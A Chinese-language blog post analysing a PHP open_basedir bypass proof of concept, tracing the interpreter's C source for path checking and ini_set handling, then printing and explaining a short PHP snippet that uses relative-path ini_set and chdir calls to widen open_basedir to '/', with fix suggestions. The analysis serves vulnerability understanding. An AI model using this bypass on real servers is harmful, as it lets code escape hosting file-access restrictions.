<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="php open_basedir poc分析近日在CTF交流群中看到一个绕过open_basedir限制的poc  对这个poc产生了极大的兴趣，因此翻出php的源码来下断点分析一波php open_basedir的机制。 在/main/fopen_wrappers.c中PHPAPI int php_check_open_basedir_ex(const char *path, int warn)">
<meta name="keywords" content="Web">
<meta property="og:type" content="article">
<meta property="og:title" content="php open_basedir 绕过poc分析">
<meta property="og:url" content="https://hexo.imagemlt.xyz/post/php-bypass-open-basedir/index.html">
<meta property="og:site_name" content="Image&#39;s blog">
<meta property="og:description" content="php open_basedir poc分析近日在CTF交流群中看到一个绕过open_basedir限制的poc  对这个poc产生了极大的兴趣，因此翻出php的源码来下断点分析一波php open_basedir的机制。 在/main/fopen_wrappers.c中PHPAPI int php_check_open_basedir_ex(const char *path, int warn)">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79ly1g1ruetkvhyj30n01dstdl.jpg">
<meta property="og:updated_time" content="2019-04-05T10:32:14.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php open_basedir 绕过poc分析">
<meta name="twitter:description" content="php open_basedir poc分析近日在CTF交流群中看到一个绕过open_basedir限制的poc  对这个poc产生了极大的兴趣，因此翻出php的源码来下断点分析一波php open_basedir的机制。 在/main/fopen_wrappers.c中PHPAPI int php_check_open_basedir_ex(const char *path, int warn)">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/006tNc79ly1g1ruetkvhyj30n01dstdl.jpg">






  <link rel="canonical" href="https://hexo.imagemlt.xyz/post/php-bypass-open-basedir/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>php open_basedir 绕过poc分析 | Image's blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
	<a href="https://github.com/imagemlt"><img style="position: absolute; top: 0; right: 0; border: 0;z-index:1" src="https://s3.amazonaws.com/github/ribbons/forkme_right_orange_ff7600.png" alt="Fork me on GitHub"></a>
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Image's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <h1 class="site-subtitle" itemprop="description">Welcome to Image's Blog</h1>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-links">
    <a href="/links/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-link"></i> <br>Links</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hexo.imagemlt.xyz/post/php-bypass-open-basedir/index.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Imagemlt">
      <meta itemprop="description" content="personal blog">
      <meta itemprop="image" content="https://avatars0.githubusercontent.com/u/26888704?s=460&v=4">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Image's blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">php open_basedir 绕过poc分析
              
            
          </h2>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-04-05 18:28:26 / Modified: 18:32:14" itemprop="dateCreated datePublished" datetime="2019-04-05T18:28:26+08:00">2019-04-05</time>
            

            
              

              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="php-open-basedir-poc分析"><a href="#php-open-basedir-poc分析" class="headerlink" title="php open_basedir poc分析"></a>php open_basedir poc分析</h1><p>近日在CTF交流群中看到一个绕过open_basedir限制的poc</p>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79ly1g1ruetkvhyj30n01dstdl.jpg" style="width:50%;"></p>
<p>对这个poc产生了极大的兴趣，因此翻出php的源码来下断点分析一波php open_basedir的机制。</p>
<p>在<code>/main/fopen_wrappers.c</code>中<code>PHPAPI int php_check_open_basedir_ex(const char *path, int warn)</code>方法是php在处理文件操作时用于验证open_basedir的方法。我们查看一下他的实现方法</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">PHPAPI <span class="keyword">int</span> <span class="title">php_check_open_basedir_ex</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *path, <span class="keyword">int</span> warn)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="comment">/* Only check when open_basedir is available */</span></span><br><span class="line">	<span class="keyword">if</span> (PG(open_basedir) &amp;&amp; *PG(open_basedir)) &#123;</span><br><span class="line">		<span class="keyword">char</span> *pathbuf;</span><br><span class="line">		<span class="keyword">char</span> *ptr;</span><br><span class="line">		<span class="keyword">char</span> *end;</span><br><span class="line"></span><br><span class="line">		<span class="comment">/* Check if the path is too long so we can give a more useful error</span></span><br><span class="line"><span class="comment">		* message. */</span></span><br><span class="line">		<span class="keyword">if</span> (<span class="built_in">strlen</span>(path) &gt; (MAXPATHLEN - <span class="number">1</span>)) &#123;</span><br><span class="line">			php_error_docref(<span class="literal">NULL</span>, E_WARNING, <span class="string">"File name is longer than the maximum allowed path length on this platform (%d): %s"</span>, MAXPATHLEN, path);</span><br><span class="line">			errno = EINVAL;</span><br><span class="line">			<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		pathbuf = estrdup(PG(open_basedir));</span><br><span class="line"></span><br><span class="line">		ptr = pathbuf;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">while</span> (ptr &amp;&amp; *ptr) &#123;</span><br><span class="line">			end = <span class="built_in">strchr</span>(ptr, DEFAULT_DIR_SEPARATOR);</span><br><span class="line">			<span class="keyword">if</span> (end != <span class="literal">NULL</span>) &#123;</span><br><span class="line">				*end = <span class="string">'\0'</span>;</span><br><span class="line">				end++;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (php_check_specific_open_basedir(ptr, path) == <span class="number">0</span>) &#123;</span><br><span class="line">				efree(pathbuf);</span><br><span class="line">				<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			ptr = end;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> (warn) &#123;</span><br><span class="line">			php_error_docref(<span class="literal">NULL</span>, E_WARNING, <span class="string">"open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)"</span>, path, PG(open_basedir));</span><br><span class="line">		&#125;</span><br><span class="line">		efree(pathbuf);</span><br><span class="line">		errno = EPERM; <span class="comment">/* we deny permission to open it */</span></span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* Nothing to check... */</span></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>跟进<code>php_check_specific_open_basedir</code>，这个函数是具体实现每一个路径的判断，一个很长的函数,重点在如下几行：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (expand_filepath(path, resolved_name) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>这里是将传入的path扩展为绝对路径存放于resolved_name</p>
<p>第214行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (expand_filepath(local_open_basedir, resolved_basedir) != <span class="keyword">NULL</span>) &#123;</span><br></pre></td></tr></table></figure>
<p>这里会根据local_open_basedir的值扩展为绝对路径存放于resolved_basedir</p>
<p>241行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (strncasecmp(resolved_basedir, resolved_name, resolved_basedir_len) == <span class="number">0</span>) &#123;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span></span></span><br><span class="line">		<span class="keyword">if</span> (<span class="built_in">strncmp</span>(resolved_basedir, resolved_name, resolved_basedir_len) == <span class="number">0</span>) &#123;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">			<span class="keyword">if</span> (resolved_name_len &gt; resolved_basedir_len &amp;&amp;</span><br><span class="line">				resolved_name[resolved_basedir_len - <span class="number">1</span>] != PHP_DIR_SEPARATOR) &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="comment">/* File is in the right directory */</span></span><br><span class="line">				<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="comment">/* /openbasedir/ and /openbasedir are the same directory */</span></span><br><span class="line">			<span class="keyword">if</span> (resolved_basedir_len == (resolved_name_len + <span class="number">1</span>) &amp;&amp; resolved_basedir[resolved_basedir_len - <span class="number">1</span>] == PHP_DIR_SEPARATOR) &#123;</span><br><span class="line">#ifdef PHP_WIN32</span><br><span class="line">				<span class="keyword">if</span> (strncasecmp(resolved_basedir, resolved_name, resolved_name_len) == <span class="number">0</span>) &#123;</span><br><span class="line">#<span class="keyword">else</span></span><br><span class="line">				<span class="keyword">if</span> (<span class="built_in">strncmp</span>(resolved_basedir, resolved_name, resolved_name_len) == <span class="number">0</span>) &#123;</span><br><span class="line">#endif</span><br><span class="line">					<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到这里在判断是否在路径范围内时，主要比较依据是先用strncmp判断与resolved_basedir长度内的部分是否完全一致，一致的话如果resolved_name与resolved_basedir长度相等则说明就在同一路径，返回0表示允许，长度大于resolved_basedir则判断超出的第一个字符是否不是<code>/</code>，是则返回成功，不是则返回失败。</p>
<p>这里我们再重点看一下<code>expand_filepath</code>这个函数的实现,主要实现为<code>PHPAPI char *expand_filepath_with_mode</code>,重点位于814行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (virtual_file_ex(&amp;new_state, filepath, <span class="literal">NULL</span>, realpath_mode)) &#123;</span><br><span class="line">		efree(new_state.cwd);</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (real_path) &#123;</span><br><span class="line">		copy_len = new_state.cwd_length &gt; MAXPATHLEN - <span class="number">1</span> ? MAXPATHLEN - <span class="number">1</span> : new_state.cwd_length;</span><br><span class="line">		<span class="built_in">memcpy</span>(real_path, new_state.cwd, copy_len);</span><br><span class="line">		real_path[copy_len] = <span class="string">'\0'</span>;</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		real_path = estrndup(new_state.cwd, new_state.cwd_length);</span><br><span class="line">	&#125;</span><br><span class="line">	efree(new_state.cwd);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> real_path;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>查看<code>virtual_file_ex</code>的实现,1337行之前的操作为如果path不是绝对路径则将path拼接至state.cwd得到resolved_path,重点第1337行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">path_length = tsrm_realpath_r(resolved_path, start, path_length, &amp;ll, &amp;t, use_realpath, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br></pre></td></tr></table></figure>
<p>跟进<code>tsrm_realpath_r</code>,可以看到操作主要是递归去掉双斜杠和<code>.</code>以及<code>..</code></p>
<p>这便是php在处理文件操作判断open_basedir的实现。我们再看php的内置函数<code>ini_set</code>的实现方法,在<code>ext/standard/basic_functions.c</code>中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">PHP_FUNCTION(ini_set)</span><br><span class="line">&#123;</span><br><span class="line">	zend_string *varname;</span><br><span class="line">	zend_string *new_value;</span><br><span class="line">	zend_string *val;</span><br><span class="line"></span><br><span class="line">	ZEND_PARSE_PARAMETERS_START(<span class="number">2</span>, <span class="number">2</span>)</span><br><span class="line">		Z_PARAM_STR(varname)</span><br><span class="line">		Z_PARAM_STR(new_value)</span><br><span class="line">	ZEND_PARSE_PARAMETERS_END();</span><br><span class="line"></span><br><span class="line">	val = zend_ini_get_value(varname);</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* copy to return here, because alter might free it! */</span></span><br><span class="line">	<span class="keyword">if</span> (val) &#123;</span><br><span class="line">		<span class="keyword">if</span> (ZSTR_IS_INTERNED(val)) &#123;</span><br><span class="line">			RETVAL_INTERNED_STR(val);</span><br><span class="line">		&#125; <span class="keyword">else</span> <span class="keyword">if</span> (ZSTR_LEN(val) == <span class="number">0</span>) &#123;</span><br><span class="line">			RETVAL_EMPTY_STRING();</span><br><span class="line">		&#125; <span class="keyword">else</span> <span class="keyword">if</span> (ZSTR_LEN(val) == <span class="number">1</span>) &#123;</span><br><span class="line">			RETVAL_INTERNED_STR(ZSTR_CHAR((zend_uchar)ZSTR_VAL(val)[<span class="number">0</span>]));</span><br><span class="line">		&#125; <span class="keyword">else</span> <span class="keyword">if</span> (!(GC_FLAGS(val) &amp; GC_PERSISTENT)) &#123;</span><br><span class="line">			ZVAL_NEW_STR(return_value, zend_string_copy(val));</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			ZVAL_NEW_STR(return_value, zend_string_init(ZSTR_VAL(val), ZSTR_LEN(val), <span class="number">0</span>));</span><br><span class="line">		&#125;</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		RETVAL_FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _CHECK_PATH(var, var_len, ini) php_ini_check_path(var, var_len, ini, sizeof(ini))</span></span><br><span class="line">	<span class="comment">/* open basedir check */</span></span><br><span class="line">	<span class="keyword">if</span> (PG(open_basedir)) &#123;</span><br><span class="line">		<span class="keyword">if</span> (_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"error_log"</span>) ||</span><br><span class="line">			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"java.class.path"</span>) ||</span><br><span class="line">			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"java.home"</span>) ||</span><br><span class="line">			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"mail.log"</span>) ||</span><br><span class="line">			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"java.library.path"</span>) ||</span><br><span class="line">			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), <span class="string">"vpopmail.directory"</span>)) &#123;</span><br><span class="line">			<span class="keyword">if</span> ( (ZSTR_VAL(new_value))) &#123;</span><br><span class="line">				zval_ptr_dtor_str(return_value);</span><br><span class="line">				RETURN_FALSE;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">undef</span> _CHECK_PATH</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (zend_alter_ini_entry_ex(varname, new_value, PHP_INI_USER, PHP_INI_STAGE_RUNTIME, <span class="number">0</span>) == FAILURE) &#123;</span><br><span class="line">		zval_ptr_dtor_str(return_value);</span><br><span class="line">		RETURN_FALSE;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>由于我们ini_set的是<code>open_basedir</code>于是重要一行便落到了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (zend_alter_ini_entry_ex(varname, new_value, PHP_INI_USER, PHP_INI_STAGE_RUNTIME, <span class="number">0</span>) == FAILURE) &#123;</span><br></pre></td></tr></table></figure>
<p>查看<code>zend_alter_ini_entry_ex</code>的实现,重要几行为</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!ini_entry-&gt;on_modify</span><br><span class="line">		|| ini_entry-&gt;on_modify(ini_entry, duplicate, ini_entry-&gt;mh_arg1, ini_entry-&gt;mh_arg2, ini_entry-&gt;mh_arg3, stage) == SUCCESS) &#123;</span><br><span class="line">		<span class="keyword">if</span> (modified &amp;&amp; ini_entry-&gt;orig_value != ini_entry-&gt;value) &#123; <span class="comment">/* we already changed the value, free the changed value */</span></span><br><span class="line">			zend_string_release(ini_entry-&gt;value);</span><br><span class="line">		&#125;</span><br><span class="line">		ini_entry-&gt;value = duplicate;</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		zend_string_release(duplicate);</span><br><span class="line">		<span class="keyword">return</span> FAILURE;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>调试可知,<code>open_basedir</code>对应的<code>on_modify</code>函数为<code>OnUpdateBaseDir</code>，重要几行为</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ptr = pathbuf = estrdup(ZSTR_VAL(new_value));</span><br><span class="line">	<span class="keyword">while</span> (ptr &amp;&amp; *ptr) &#123;</span><br><span class="line">		end = <span class="built_in">strchr</span>(ptr, DEFAULT_DIR_SEPARATOR);</span><br><span class="line">		<span class="keyword">if</span> (end != <span class="literal">NULL</span>) &#123;</span><br><span class="line">			*end = <span class="string">'\0'</span>;</span><br><span class="line">			end++;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> (php_check_open_basedir_ex(ptr, <span class="number">0</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">			<span class="comment">/* At least one portion of this open_basedir is less restrictive than the prior one, FAIL */</span></span><br><span class="line">			efree(pathbuf);</span><br><span class="line">			<span class="keyword">return</span> FAILURE;</span><br><span class="line">		&#125;</span><br><span class="line">		ptr = end;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>可见这里便是调用了<code>php_check_open_basedir_ex</code>来判断要更改的open_basedir是否合法。</p>
<p>回到<code>zend_alter_ini_entry_ex</code>中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">duplicate = zend_string_copy(new_value);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (!ini_entry-&gt;on_modify</span><br><span class="line">		|| ini_entry-&gt;on_modify(ini_entry, duplicate, ini_entry-&gt;mh_arg1, ini_entry-&gt;mh_arg2, ini_entry-&gt;mh_arg3, stage) == SUCCESS) &#123;</span><br><span class="line">		<span class="keyword">if</span> (modified &amp;&amp; ini_entry-&gt;orig_value != ini_entry-&gt;value) &#123; <span class="comment">/* we already changed the value, free the changed value */</span></span><br><span class="line">			zend_string_release(ini_entry-&gt;value);</span><br><span class="line">		&#125;</span><br><span class="line">		ini_entry-&gt;value = duplicate;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到<code>open_basedir</code>便会被直接设置为我们设置的值。</p>
<p>再来看我们的poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">chdir(<span class="string">'..'</span>);</span><br><span class="line">ini_set(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);</span><br></pre></td></tr></table></figure>
<p>假定我们的<code>open_basedir</code>为<code>/var/www/html</code>,我们位于<code>/var/www/html/test</code>目录下</p>
<p>执行第一个<code>ini_set</code>时，首先判断<code>/var/www/html/test/..</code>即<code>/var/www/html/</code>是否为open_basedir内，判断成功，因此直接更新open_basedir为<code>..</code></p>
<p>执行<code>chdir(&#39;..&#39;)</code>时，检测open_basedir，<code>..</code>根据当前目录补全后为<code>/var/www/html</code>，而我们的<code>open_basedir</code>为<code>..</code>,补全后也是<code>/var/www/html</code>，因此可以chdir成功。</p>
<p>再次<code>chdir(&#39;..&#39;)</code>,检测open_basedir,<code>..</code>补全为<code>/var/www</code>,而此时的<code>open_basedir</code>补全也为<code>/var/www</code>，判断成功。</p>
<p>因此一系列的<code>chdir(&#39;..&#39;)</code>都会成功执行，最后当前目录跳到了<code>/</code>，<code>open_basedir</code>为<code>..</code>,设置<code>open_basedir(&#39;/&#39;)</code>同样可以执行成功，便成功实现了调整<code>open_basedir</code>至任意目录。</p>
<p>这个poc的构造十分巧妙，修复建议便是禁止在open_basedir已有的情况下修改<code>open_basedir</code>或者禁<code>open_basedir</code>可以被设置为相对路径。</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
